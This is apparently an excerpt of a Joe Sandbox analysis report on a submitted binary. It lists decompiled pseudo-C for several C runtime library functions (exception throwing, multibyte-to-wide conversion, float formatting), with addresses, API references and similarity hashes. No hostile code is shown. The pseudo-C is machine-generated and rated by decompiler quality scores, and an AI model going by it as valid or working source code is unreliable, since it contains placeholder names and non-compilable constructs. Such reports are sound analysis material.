COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E00407F62() {
				intOrPtr _v16;
				void* _v28;
				void* _v64;
				void* _v104;
				void* __esi;
				void* _t17;
				intOrPtr* _t19;
				void* _t20;
				void* _t21;
				intOrPtr* _t22;
				void* _t24;

				_push(0x44);
				E0040A41A(E0041BB98, _t17, _t20, _t21);
				E004070F9(_t24 - 0x28, _t20, "invalid string position");
				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
				_t19 = _t24 - 0x50;
				E00407EDB(_t19, _t24 - 0x28);
				E00408993(_t24 - 0x50, 0x41e1c4);
				asm("int3");
				_push(_t24);
				_push(_t21);
				_push(_v16);
				_t22 = _t19;
				E00407163(_t19);
				 *_t22 = 0x4015dc;
				return _t22;
			}

0x00407f62
0x00407f69
0x00407f76
0x00407f7b
0x00407f83
0x00407f86
0x00407f94
0x00407f99
0x00407f9c
0x00407f9f
0x00407fa0
0x00407fa3
0x00407fa5
0x00407faa
0x00407fb4

APIs

__EH_prolog3.LIBCMT ref: 00407F69
std::bad_exception::bad_exception.LIBCMT ref: 00407F86
__CxxThrowException@8.LIBCMT ref: 00407F94

Part of subcall function 00408993: RaiseException.KERNEL32(?,?,00408992,?,?,?,?,%\@,00408992,?,0041DC84,005890B4,?,00405C25,?), ref: 004089D5

Part of subcall function 00407163: __EH_prolog.LIBCMT ref: 00407168
Part of subcall function 00407163: std::exception::exception.LIBCMT ref: 00407179

Strings

invalid string position, xrefs: 00407F6E

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ExceptionException@8H_prologH_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
String ID: invalid string position
API String ID: 255094582-1799206989
Opcode ID: f61dd5d69e0939b6d01dee7f2a7077beb1d929d1cc6191542035642852c20efb
Instruction ID: c62036e1dc2366c616dcb7c6471c16903c1fd0bc8280358541a65c12d3c157ab
Opcode Fuzzy Hash: f61dd5d69e0939b6d01dee7f2a7077beb1d929d1cc6191542035642852c20efb
Instruction Fuzzy Hash: 64F0A07690421CA7C710EAD2CC05ACEB728AB40760F10403FB201BB6C1DBBCA904C79E

Uniqueness

Uniqueness Score: -1.00%

Function 0040712A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040712A(void* __edi) {
				intOrPtr* _t26;
				intOrPtr _t30;
				intOrPtr* _t34;
				void* _t36;

				E004088F4(E0041BA05, _t36);
				E004070F9(_t36 - 0x28, __edi, "vector<T> too long");
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				_t26 = _t36 - 0x50;
				E00406F6D(_t26, _t36 - 0x28);
				E00408993(_t36 - 0x50, 0x41de9c);
				asm("int3");
				E004088F4(E0041B9C6, _t36);
				_push(_t26);
				_push(__edi);
				_t30 =  *((intOrPtr*)(_t36 + 8));
				_t34 = _t26;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E004080C3(_t26, _t30);
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				_t31 = _t30 + 0xc;
				 *_t34 = 0x4014f8;
				E00406EE5(_t34 + 0xc, _t30 + 0xc, _t31);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}

0x0040712f
0x0040713f
0x00407144
0x0040714c
0x0040714f
0x0040715d
0x00407162
0x00407168
0x0040716d
0x0040716f
0x00407170
0x00407173
0x00407176
0x00407179
0x0040717e
0x00407182
0x00407189
0x0040718f
0x0040719b
0x004071a3

APIs

__EH_prolog.LIBCMT ref: 0040712F
std::bad_exception::bad_exception.LIBCMT ref: 0040714F
__CxxThrowException@8.LIBCMT ref: 0040715D

Part of subcall function 00408993: RaiseException.KERNEL32(?,?,00408992,?,?,?,?,%\@,00408992,?,0041DC84,005890B4,?,00405C25,?), ref: 004089D5

Strings

vector<T> too long, xrefs: 00407137

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ExceptionException@8H_prologRaiseThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 1606262581-3788999226
Opcode ID: 69cd5571ddfce6920626efc52f704254995346787261a5fd056a9b7cc15e5b1e
Instruction ID: 42076f75a14a4ac4470151090ea84defdcca15381ee61ed573a18a751ee48fbe
Opcode Fuzzy Hash: 69cd5571ddfce6920626efc52f704254995346787261a5fd056a9b7cc15e5b1e
Instruction Fuzzy Hash: B2D0ECB291020856C704FAE1C946ADD7378AF14305F50503FF251B5085DFB856489659

Uniqueness

Uniqueness Score: -1.00%

Function 0041B2E5 Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041B2E5(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E00409520( &_v20, _a16);
						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
							if(E0041815D( *_t72 & 0x000000ff,  &_v20) == 0) {
								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
									L10:
									if(_v8 != 0) {
										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									}
									return 1;
								}
								L21:
								_t54 = E0040B78C();
								 *_t54 = 0x2a;
								if(_v8 != 0) {
									_t54 = _v12;
									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							if(_t65 <= 1 || _a12 < _t65) {
								L17:
								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
								_t56 = _v20;
								if(_t58 != 0) {
									L19:
									_t57 =  *(_t56 + 0xac);
									if(_v8 == 0) {
										return _t57;
									}
									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
									return _t57;
								}
								goto L17;
							}
						}
						_t59 = _a4;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x0041b2ef
0x0041b2f6
0x0041b30d
0x00000000
0x0041b2fd
0x0041b2ff
0x0041b319
0x0041b324
0x0041b356
0x0041b3f4
0x0041b334
0x0041b337
0x0041b33c
0x0041b33c
0x00000000
0x0041b342
0x0041b3b6
0x0041b3b6
0x0041b3bb
0x0041b3c4
0x0041b3c6
0x0041b3c9
0x0041b3c9
0x00000000
0x0041b3cd
0x0041b358
0x0041b35b
0x0041b364
0x0041b38b
0x0041b394
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b36b
0x0041b37e
0x0041b386
0x0041b389
0x0041b39b
0x0041b39b
0x0041b3a4
0x0041b312
0x0041b312
0x0041b3ad
0x00000000
0x0041b3ad
0x00000000
0x0041b389
0x0041b364
0x0041b326
0x0041b32b
0x0041b331
0x0041b331
0x00000000
0x0041b301
0x0041b301
0x0041b306
0x0041b30a
0x0041b30a
0x00000000
0x0041b306
0x0041b2ff

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041B319
__isleadbyte_l.LIBCMT ref: 0041B34D
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 0041B37E
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 0041B3EC

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d1751aa10d7e272af0a786b944692fa67db3e632575f20c9d99d3119fca490e7
Instruction ID: 7244f1dc7e8ca15d7e6b135263701ff30affec06e82036b72f7569097ebb19b3
Opcode Fuzzy Hash: d1751aa10d7e272af0a786b944692fa67db3e632575f20c9d99d3119fca490e7
Instruction Fuzzy Hash: BC31CE31A0424AEFCB20DF64C8849EF7BA5EF01310B14456AF8719B291E734DDA1DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C575 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040C575(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0040BE66(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0040BF56(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0040C47B(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0040C3C0(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x0040c57a
0x0040c580
0x0040c5f3
0x00000000
0x0040c587
0x0040c587
0x0040c58a
0x0040c5a5
0x0040c5a8
0x0040c5c8
0x0040c5da
0x0040c5aa
0x0040c5aa
0x0040c5ad
0x00000000
0x0040c5af
0x0040c5c1
0x0040c5c1
0x0040c5ad
0x0040c5f8
0x0040c5fc
0x0040c58c
0x0040c5a4
0x0040c5a4
0x0040c58a

APIs

__cftof_l.LIBCMT ref: 0040C59B

Part of subcall function 0040C3C0: __fltout2.LIBCMT ref: 0040C3EC

__cftog_l.LIBCMT ref: 0040C5C1
__cftoe_l.LIBCMT ref: 0040C5F3

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: fd594d69085debdeafe1bda514c30db4bd561ab30137952ea5036e48772960c9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 0511B77604004AFBCF165F84CC81CEE3F62BB19344B448526FE18641B1C33ADA71AB89

Uniqueness

Uniqueness Score: -1.00%

Function 0040A76C Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040A76C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t22 = __ebx;
				_push(0xc);
				_push(0x41e2f8);
				E0040EF38(__ebx, __edi, __esi);
				_t29 = E0040DEA3(__ebx, _t25, _t31);
				_t13 =  *0x4311f0; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E0040E43F(_t22, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x4312d8; // 0x431200
					 *((intOrPtr*)(_t30 - 0x1c)) = E0040A72E(_t8, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E0040A7D6();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E0040DEA3(_t22, _t25, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E0040F461(_t25, 0x20);
				}
				return E0040EF7D(_t29);
			}

0x0040a76c
0x0040a76c
0x0040a76c
0x0040a76c
0x0040a76e
0x0040a773
0x0040a77d
0x0040a77f
0x0040a787
0x0040a7ab
0x0040a7ad
0x0040a7b3
0x0040a7b7
0x0040a7ba
0x0040a7c5
0x0040a7c8
0x0040a7cf
0x0040a789
0x0040a789
0x0040a78d
0x00000000
0x0040a78f
0x0040a794
0x0040a794
0x0040a78d
0x0040a799
0x0040a79d
0x0040a7a2
0x0040a7aa

APIs

__getptd.LIBCMT ref: 0040A778

Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3

__getptd.LIBCMT ref: 0040A78F
__amsg_exit.LIBCMT ref: 0040A79D
__lock.LIBCMT ref: 0040A7AD

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: aa6ed99abc64c891ac31feeaaf39433fc2ad42ada5a402ef7d643317ffbe2b54
Instruction ID: ac4797e92ef69f602190e8664604eebcd566a754edb1e8a05d15aa98ff2f15e6
Opcode Fuzzy Hash: aa6ed99abc64c891ac31feeaaf39433fc2ad42ada5a402ef7d643317ffbe2b54
Instruction Fuzzy Hash: 6CF030359507119AD720FBBAD802B4A72B06F90718F10867FE450BB2D2CB7CA9558B9F

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB65 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FB65() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x58ada0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x58ada0 = _t5;
				}
				_t6 = E0040A2DA(_t5, 4);
				 *0x589d80 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x4309f8;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x430c78) {
							break;
						}
						_t6 =  *0x589d80; // 0x21a0fd0
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x430a08;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x589c80 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x430a68);
					return 0;
				} else {
					 *0x58ada0 = _t26;
					_t6 = E0040A2DA(_t26, 4);
					 *0x589d80 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x0040fb65
0x0040fb6d
0x0040fb70
0x0040fb7b
0x0040fb7d
0x00000000
0x0040fb7d
0x0040fb72
0x0040fb72
0x0040fb7f
0x0040fb7f
0x0040fb7f
0x0040fb87
0x0040fb8e
0x0040fb95
0x0040fbb5
0x0040fbb5
0x0040fbb7
0x0040fbc3
0x0040fbc3
0x0040fbc6
0x0040fbc9
0x0040fbd2
0x00000000
0x00000000
0x0040fbbe
0x0040fbbe
0x0040fbd6
0x0040fbd7
0x0040fbd9
0x0040fbdf
0x0040fbf3
0x0040fbf9
0x0040fc03
0x0040fc03
0x0040fc05
0x0040fc08
0x0040fc09
0x0040fc15
0x0040fb97
0x0040fb9a
0x0040fba0
0x0040fba7
0x0040fbae
0x00000000
0x0040fbb0
0x0040fbb2
0x0040fbb4
0x0040fbb4
0x0040fbae

APIs

__calloc_crt.LIBCMT ref: 0040FB87
__calloc_crt.LIBCMT ref: 0040FBA0

Strings

hC, xrefs: 0040FC09

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: __calloc_crt
String ID: hC
API String ID: 3494438863-2898246442
Opcode ID: 1e5266166ddf5a609b8dc43ceae80ef3c9e758472361a41a26305f7d25a589bf
Instruction ID: 6d5708f63d673b3498be43454bc9c1e08c72c7732783bcff1d19ad24b83a50e6
Opcode Fuzzy Hash: 1e5266166ddf5a609b8dc43ceae80ef3c9e758472361a41a26305f7d25a589bf
Instruction Fuzzy Hash: 1911EB313056114BF7348A1DFC61AA23291F794324B18123BE901F77D4E778A849974D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040D3A9(void* __ebx, void* __edi, intOrPtr* __esi) {
				intOrPtr _t17;
				void* _t26;
				intOrPtr* _t28;
				void* _t29;
				void* _t30;

				_t28 = __esi;
				_t19 = __ebx;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0040883F(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0040DEA3(__ebx, _t26, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0040DEA3(_t19, _t26, _t30);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
							_t17 = E00408818( *((intOrPtr*)(_t28 + 0x18)));
							_t38 = _t17;
							if(_t17 != 0) {
								_push( *((intOrPtr*)(_t29 + 0x10)));
								_push(_t28);
								return E0040D141(_t38);
							}
						}
					}
				}
				return _t17;
			}

0x0040d3a9
0x0040d3a9
0x0040d3ac
0x0040d3b2
0x0040d3c0
0x0040d3c6
0x0040d3ce
0x0040d3da
0x0040d3e2
0x0040d3ea
0x0040d3fe
0x0040d409
0x0040d40f
0x0040d411
0x0040d413
0x0040d416
0x00000000
0x0040d41d
0x0040d411
0x0040d3fe
0x0040d3ea
0x0040d41e

APIs

Part of subcall function 0040883F: __getptd.LIBCMT ref: 00408845
Part of subcall function 0040883F: __getptd.LIBCMT ref: 00408855

__getptd.LIBCMT ref: 0040D3B8

Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3

__getptd.LIBCMT ref: 0040D3C6

Strings

csm, xrefs: 0040D3D4

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: ac1f973b796d5365a90fbcd4a746e398fb8950caba162102ecc38e3d6b3026eb
Instruction ID: 40d6bb4f4d65bf62d272264d28add61a1beb27104a0deb0f638c3828df9dfac2
Opcode Fuzzy Hash: ac1f973b796d5365a90fbcd4a746e398fb8950caba162102ecc38e3d6b3026eb
Instruction Fuzzy Hash: 85014F39C00215CBCF34AFA5C44066EB3B5AF58311F54443FE8417AAD1CF78A988DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00405A80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00405A80(intOrPtr* __ecx) {
				intOrPtr* _t28;
				void* _t30;

				_t24 = __ecx;
				E004088F4(E0041B930, _t30);
				_push(__ecx);
				_push(__ecx);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				_t28 = __ecx;
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				if( *((intOrPtr*)(_t30 + 0x10)) != 0) {
					_t24 = __ecx + 4;
					 *__ecx = 0x401594;
					E00405977(__ecx + 4);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					 *(_t30 - 0x10) = 1;
				}
				 *((intOrPtr*)(_t28 +  *((intOrPtr*)( *_t28 + 4)))) = 0x401428;
				if( *((char*)(_t30 + 0xc)) != 0) {
					E00407D0A(_t24,  *((intOrPtr*)( *_t28 + 4)) + _t28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t28;
			}

0x00405a80
0x00405a85
0x00405a8a
0x00405a8b
0x00405a8c
0x00405a95
0x00405a97
0x00405a9a
0x00405a9c
0x00405a9f
0x00405aa5
0x00405aaa
0x00405aae
0x00405aae
0x00405abe
0x00405ac5
0x00405acf
0x00405ad4
0x00405adb
0x00405ae3

APIs

__EH_prolog.LIBCMT ref: 00405A85
std::ios_base::_Addstd.LIBCPMT ref: 00405ACF

Strings

)d@, xrefs: 00405ABE

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

API ID: AddstdH_prologstd::ios_base::_
String ID: )d@
API String ID: 2233147633-3213904718
Opcode ID: c0bd553b6c3e0a0b5c3f6e343adaeb3a6d80b444fe5c59cb1b44f4dcdecf4322
Instruction ID: f948699608376b58d3f5620e85ddc316ec54d55a282d4a6f2d067584a834ddbb
Opcode Fuzzy Hash: c0bd553b6c3e0a0b5c3f6e343adaeb3a6d80b444fe5c59cb1b44f4dcdecf4322
Instruction Fuzzy Hash: 68F037B1A102199BD724DF88C945BABB7E4EF08318F10852FE456A7391C7B899008F98

Uniqueness

Uniqueness Score: -1.00%

Function 00405CA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CA9(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _t8;

				_t8 = __ecx;
				E00404E5A(__ecx, _a8);
				 *__ecx = 0x401448;
				E00404EA8(__ecx, _a4);
				return _t8;
			}

0x00405cb0
0x00405cb2
0x00405cbc
0x00405cc2
0x00405ccb

APIs

std::bad_exception::bad_exception.LIBCMT ref: 00405CB2
ctype.LIBCPMT ref: 00405CC2

Part of subcall function 00404EA8: std::_Locinfo::_Getctype.LIBCPMT ref: 00404EB9

Strings

2^@, xrefs: 00405CBC

Memory Dump Source

Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd

Similarity

